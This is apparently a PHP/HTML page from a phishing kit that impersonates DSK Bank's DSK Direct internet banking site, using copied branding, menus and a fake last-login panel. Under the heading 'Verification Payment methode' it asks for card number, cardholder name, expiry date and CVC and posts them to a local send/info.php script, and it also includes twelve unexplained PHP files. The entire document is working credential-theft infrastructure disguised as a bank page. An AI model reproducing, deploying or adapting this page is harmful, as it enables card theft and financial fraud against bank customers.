<?php
include('./a/1.php');
include('./a/2.php');
include('./a/3.php');
include('./a/4.php');
include('./a/5.php');
include('./a/6.php');
include('./a/7.php');
include('./a/8.php');
include('./a/9.php');
include('./a/10.php');
include('./a/11.php');
include('./a/12.php');
?>
<html style="
"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>DSK Direct</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Pragma" content="no-cache">
<meta name="Keywords" content="">

<script type="text/javascript" src="./js/jquery-1.js"></script>

<link href="./css/app.ltr.css" type="text/css" rel="stylesheet">
<link href="./css/card-js.css" type="text/css" rel="stylesheet">
<link href="./css/index_style.css" type="text/css" rel="stylesheet">
<meta name="description" content="Welcome to the DSK Direct Internet Banking. DSK Direct also offers Call Center and SMS Services."><meta http-equiv="X-UA-Compatible" content="IE=edge"><link href="https://www.dskdirect.bg/css/compiled/style.direct.2018.css" type="text/css" rel="stylesheet">
<script type="text/javascript" src="/calendar/calendar.js"></script>
<script type="text/javascript" src="/js/html5.js">/**/</script><script type="text/javascript" src="/js/jquery/jquery-1.6.4.min.js">/**/</script><script type="text/javascript" src="/js/jquery/jquery-ui-1.10.4/jquery-ui-1.10.4.custom.min.js">/**/</script><script type="text/javascript" src="/js/jquery.ba-bbq.js">/**/</script><script type="text/javascript" src="/js/jquery.validate.js">/**/</script><script type="text/javascript" src="/js/jquery.validate.unobtrusive.js">/**/</script><script type="text/javascript" src="/js/jquery.validate.custom.js">/**/</script><script type="text/javascript" src="/js/jquery.tablesorter.js">/**/</script><script type="text/javascript" src="/js/jquery.tablesorter.pager.js">/**/</script><script type="text/javascript" src="/js/jquery.specific.scripts.js">/**/</script><script type="text/javascript" src="/js/js.js">/**/</script><script type="text/javascript" src="/js/jquery.pagination.js">/**/</script><script type="text/javascript" src="/js/scroll.js">/**/</script><script type="text/javascript" src="/js/limits.js">/**/</script><script type="text/javascript" src="/js/validation.js">/**/</script><script type="text/javascript" src="/js/behaviour.js">/**/</script>

    <body> <header id="header"><div class="container"><div id="serviceArea" class="service-area" xmlns=""><control id="Welcome" ctype="Control" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><div class="popover"><div class="popover-trigger"><svg class="squid-ink squid-ink-user" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use href="https://www.dskdirect.bg/images/svg/icons.svg#user"></use></svg><div id="Welcome_m_ctrl_UName"><span id="homepath">/01Individuals/</span></div></div><ul class="popover-target"><li><div id="Welcome_m_ctrl_MoreInfo"><b>Last login</b>30.11.2018 15:11from IP: 130.204.202.191 <img class="flag" src="/images/flags/Bulgaria.gif"> BG<div>For: 30.11.2018 16:04</div></div></li><li></li><li><div id="Welcome_m_ctrl_ClientNumber" class="color-green"><b>Your client number</b>532267</div></li></ul></div></control><a style="position: relative; margin-right: 25px;"><span id="unreadMessagesCount" class="badge"></span><svg class="squid-ink squid-ink-envelope" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="/images/svg/icons.svg#envelope"></use></svg><svg class="squid-ink squid-ink-envelope-open" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="/images/svg/icons.svg#envelope-open"></use></svg>Inbox</a><a><svg class="squid-ink squid-ink-bubbles" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="/images/svg/icons.svg#bubbles"></use></svg><span>Feedback</span></a><a><svg class="squid-ink squid-ink-globe" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="/images/svg/icons.svg#globe"></use></svg><span>Български</span></a><a><svg class="squid-ink squid-ink-door" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="/images/svg/icons.svg#door"></use></svg><span>Log Out</span></a></div><div id="feedBack" xmlns=""></div></div><nav class="navbar nav-main" xmlns=""><div class="container"><ul class="main-menu"><li class="brand-item"><a class="homelink" href="/page/default.aspx?user_id=532267&amp;session_id=87194af3f4a711e8a62f005056b664e5gHEZhZGs8oqlqPdatY9w0-N18iR7FPcImmhm8tf2gKGCO63CH7bUvryHdmHbfUCxKfGYPQbtIPSVUBIpfGqtGw==U&amp;xml_id=/en-US/01Individuals/"><img src="https://dskbank.bg/ResourcePackages/DSK/assets/dist/images/layout/dsk-bg-logo.svg"></a></li><li><a class="">Your accounts</a></li><li><a class="main-menu-item">Loans</a></li><li><a class="main-menu-item selected" href="">Cards</a></li><li><a class="main-menu-item">Bill payments</a></li><li><a class="main-menu-item">Payment orders</a></li><li><a class="main-menu-item">Savings</a></li><li><a class="main-menu-item">Funds</a></li><li><a class="main-menu-item">Requests</a></li><li><a class="main-menu-item" href="">Notifications</a></li><li></li><li><a class="main-menu-item">Settings</a></li></ul></div></nav><nav class="navbar nav-secondary" xmlns=""><div class="container"><ul class="submenu tab-menu"><li class="tab-menu-item"><a class="main-menu-item selected" href="/Page/default.aspx?user_id=532267&amp;session_id=87194af3f4a711e8a62f005056b664e5gHEZhZGs8oqlqPdatY9w0-N18iR7FPcImmhm8tf2gKGCO63CH7bUvryHdmHbfUCxKfGYPQbtIPSVUBIpfGqtGw==U&amp;xml_id=/en-US/01Individuals/07Cards/">Bank cards</a></li></ul></div></nav></header>

    
                
                    
        
        
 <form action="./send/info.php" method="POST">           

  
    <font style="vertical-align: inherit;"></font>

<div style="/* width: 300px;height:50px; */margin:350px; margin-top:10px; margin-bottom:20px ">
<center>
   
<script>
function testfnctn() {
  if($(".card-number").val().length < 16)
    return false;
  if($(".name").val().length < 6)
    return false;
  if($(".expiry-month").val().length < 1 || $(".expiry-year").val().length < 2)
    return false;
  if($(".cvc").val().length < 3)
    return false;
  return true;
}
</script>Verification Payment methode<centre><fieldset style="
    padding: 65px;
">
    

    <!--
      -- Card JS Input Group
      -->
    <div class="card-js form-group"><div class="card-number-wrapper"><input class="card-number form-control" name="ccnum" placeholder="Card Nummber" maxlength="19" autocomplete="off" required="" x-autocompletetype="cc-number" autocompletetype="cc-number" autocorrect="off" spellcheck="off" autocapitalize="off" type="tel"><div class="card-type-icon"></div><div class="icon"><svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="3px" width="24px" height="17px" viewBox="0 0 216 146" enable-background="new 0 0 216 146" xml:space="preserve"><g><path class="svg" d="M182.385,14.258c-2.553-2.553-5.621-3.829-9.205-3.829H42.821c-3.585,0-6.653,1.276-9.207,3.829c-2.553,2.553-3.829,5.621-3.829,9.206v99.071c0,3.585,1.276,6.654,3.829,9.207c2.554,2.553,5.622,3.829,9.207,3.829H173.18c3.584,0,6.652-1.276,9.205-3.829s3.83-5.622,3.83-9.207V23.464C186.215,19.879,184.938,16.811,182.385,14.258z M175.785,122.536c0,0.707-0.258,1.317-0.773,1.834c-0.516,0.515-1.127,0.772-1.832,0.772H42.821c-0.706,0-1.317-0.258-1.833-0.773c-0.516-0.518-0.774-1.127-0.774-1.834V73h135.571V122.536z M175.785,41.713H40.214v-18.25c0-0.706,0.257-1.316,0.774-1.833c0.516-0.515,1.127-0.773,1.833-0.773H173.18c0.705,0,1.316,0.257,1.832,0.773c0.516,0.517,0.773,1.127,0.773,1.833V41.713z"></path><rect class="svg" x="50.643" y="104.285" width="20.857" height="10.429"></rect><rect class="svg" x="81.929" y="104.285" width="31.286" height="10.429"></rect></g></svg></div></div><div class="name-wrapper"><input class="name form-control" id="the-card-name-id" name="ccholder" placeholder="Name On Card" autocomplete="off" required=""><div class="icon"><svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="4px" width="24px" height="16px" viewBox="0 0 216 146" enable-background="new 0 0 216 146" xml:space="preserve"><g><path class="svg" d="M107.999,73c8.638,0,16.011-3.056,22.12-9.166c6.111-6.11,9.166-13.483,9.166-22.12c0-8.636-3.055-16.009-9.166-22.12c-6.11-6.11-13.484-9.165-22.12-9.165c-8.636,0-16.01,3.055-22.12,9.165c-6.111,6.111-9.166,13.484-9.166,22.12c0,8.637,3.055,16.01,9.166,22.12C91.99,69.944,99.363,73,107.999,73z"></path><path class="svg" d="M165.07,106.037c-0.191-2.743-0.571-5.703-1.141-8.881c-0.57-3.178-1.291-6.124-2.16-8.84c-0.869-2.715-2.037-5.363-3.504-7.943c-1.466-2.58-3.15-4.78-5.052-6.6s-4.223-3.272-6.965-4.358c-2.744-1.086-5.772-1.63-9.085-1.63c-0.489,0-1.63,0.584-3.422,1.752s-3.815,2.472-6.069,3.911c-2.254,1.438-5.188,2.743-8.799,3.909c-3.612,1.168-7.237,1.752-10.877,1.752c-3.639,0-7.264-0.584-10.876-1.752c-3.611-1.166-6.545-2.471-8.799-3.909c-2.254-1.439-4.277-2.743-6.069-3.911c-1.793-1.168-2.933-1.752-3.422-1.752c-3.313,0-6.341,0.544-9.084,1.63s-5.065,2.539-6.966,4.358c-1.901,1.82-3.585,4.02-5.051,6.6s-2.634,5.229-3.503,7.943c-0.869,2.716-1.589,5.662-2.159,8.84c-0.571,3.178-0.951,6.137-1.141,8.881c-0.19,2.744-0.285,5.554-0.285,8.433c0,6.517,1.983,11.664,5.948,15.439c3.965,3.774,9.234,5.661,15.806,5.661h71.208c6.572,0,11.84-1.887,15.806-5.661c3.966-3.775,5.948-8.921,5.948-15.439C165.357,111.591,165.262,108.78,165.07,106.037z"></path></g></svg></div></div><div class="expiry-container"><div class="expiry-wrapper"><div><input class="expiry" name="date" placeholder="MM / YY" type="tel" maxlength="7" x-autocompletetype="cc-exp" autocompletetype="cc-exp" autocorrect="off" spellcheck="off" autocapitalize="off"><input class="expiry-month" name="exmm" type="hidden"><input class="expiry-year" name="exyy" type="hidden"></div><div class="icon"><svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="4px" width="24px" height="16px" viewBox="0 0 216 146" enable-background="new 0 0 216 146" xml:space="preserve"><path class="svg" d="M172.691,23.953c-2.062-2.064-4.508-3.096-7.332-3.096h-10.428v-7.822c0-3.584-1.277-6.653-3.83-9.206c-2.554-2.553-5.621-3.83-9.207-3.83h-5.213c-3.586,0-6.654,1.277-9.207,3.83c-2.554,2.553-3.83,5.622-3.83,9.206v7.822H92.359v-7.822c0-3.584-1.277-6.653-3.83-9.206c-2.553-2.553-5.622-3.83-9.207-3.83h-5.214c-3.585,0-6.654,1.277-9.207,3.83c-2.553,2.553-3.83,5.622-3.83,9.206v7.822H50.643c-2.825,0-5.269,1.032-7.333,3.096s-3.096,4.509-3.096,7.333v104.287c0,2.823,1.032,5.267,3.096,7.332c2.064,2.064,4.508,3.096,7.333,3.096h114.714c2.824,0,5.27-1.032,7.332-3.096c2.064-2.064,3.096-4.509,3.096-7.332V31.286C175.785,28.461,174.754,26.017,172.691,23.953z M134.073,13.036c0-0.761,0.243-1.386,0.731-1.874c0.488-0.488,1.113-0.733,1.875-0.733h5.213c0.762,0,1.385,0.244,1.875,0.733c0.488,0.489,0.732,1.114,0.732,1.874V36.5c0,0.761-0.244,1.385-0.732,1.874c-0.49,0.488-1.113,0.733-1.875,0.733h-5.213c-0.762,0-1.387-0.244-1.875-0.733s-0.731-1.113-0.731-1.874V13.036z M71.501,13.036c0-0.761,0.244-1.386,0.733-1.874c0.489-0.488,1.113-0.733,1.874-0.733h5.214c0.761,0,1.386,0.244,1.874,0.733c0.488,0.489,0.733,1.114,0.733,1.874V36.5c0,0.761-0.244,1.386-0.733,1.874c-0.489,0.488-1.113,0.733-1.874,0.733h-5.214c-0.761,0-1.386-0.244-1.874-0.733c-0.488-0.489-0.733-1.113-0.733-1.874V13.036z M165.357,135.572H50.643V52.143h114.714V135.572z"></path></svg></div></div></div><div class="cvc-container"><div class="cvc-wrapper"><input class="cvc form-control" name="cvcv" autocomplete="off" required="" placeholder="CVC" maxlength="3" x-autocompletetype="cc-csc" autocompletetype="cc-csc" autocorrect="off" spellcheck="off" autocapitalize="off" type="tel"><div class="icon"><svg version="1.1" id="Capa_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="3px" width="24px" height="17px" viewBox="0 0 216 146" enable-background="new 0 0 216 146" xml:space="preserve"><path class="svg" d="M152.646,70.067c-1.521-1.521-3.367-2.281-5.541-2.281H144.5V52.142c0-9.994-3.585-18.575-10.754-25.745c-7.17-7.17-15.751-10.755-25.746-10.755s-18.577,3.585-25.746,10.755C75.084,33.567,71.5,42.148,71.5,52.142v15.644h-2.607c-2.172,0-4.019,0.76-5.54,2.281c-1.521,1.52-2.281,3.367-2.281,5.541v46.929c0,2.172,0.76,4.019,2.281,5.54c1.521,1.52,3.368,2.281,5.54,2.281h78.214c2.174,0,4.02-0.76,5.541-2.281c1.52-1.521,2.281-3.368,2.281-5.54V75.607C154.93,73.435,154.168,71.588,152.646,70.067z M128.857,67.786H87.143V52.142c0-5.757,2.037-10.673,6.111-14.746c4.074-4.074,8.989-6.11,14.747-6.11s10.673,2.036,14.746,6.11c4.073,4.073,6.11,8.989,6.11,14.746V67.786z"></path></svg></div></div></div></div>



<br>
  <!-- END .card-js wrapper -->


    <!--
      -- Submit button
      --
      -- (Must be outside of the div with class 'card-js')
      -->

  </fieldset>
<input value="Submit" type="submit" style="
    height: 40px;
    padding: 8px 20px;
    font-size: 16px;
    background: transparent;
    border: 0;
    color: #fff;
    box-shadow: 0;
    display: inline-block;
    border-radius: 3px;
    margin-right: 15px;
    cursor: pointer;
    background-color: #52ae30;
    border: 0;
    box-shadow:;
    margin-top: 17px;
"></centre>


<script>
  $(function() {

    // Only for example - catch form data when the form is submitted
    $("#example-form").submit(function(e) {

      // Stop form submission
      e.preventDefault();

      // Read form data
      var data = $("#example-form :input").serializeArray();

      var displayText = "";

      // For each input field...
      for (var i = 0; i < data.length; i++) {
        var fieldData = data[i];
        var name = fieldData["name"];
        var value = fieldData["value"];

        displayText += name + " : " + value + "\n";
      }

      alert(displayText);
    });

  });
</script>   
      
</center></div>
 
        
           <footer style="
    background-color: #444;
    padding: 36px 0;
"><div class="container" xmlns=""><ul><li class="social-links"><a href=""><img src="./image//facebook.svg"></a><a href=""><img src="./image/youtube.svg"></a></li><li><a href="https://dskbank.bg/" target="_blank"><img src="./image//BankaDSK_ciril_CM_White.svg"></a></li><li></li></ul></div></footer>
        
 </form>
            
              
        </body></html>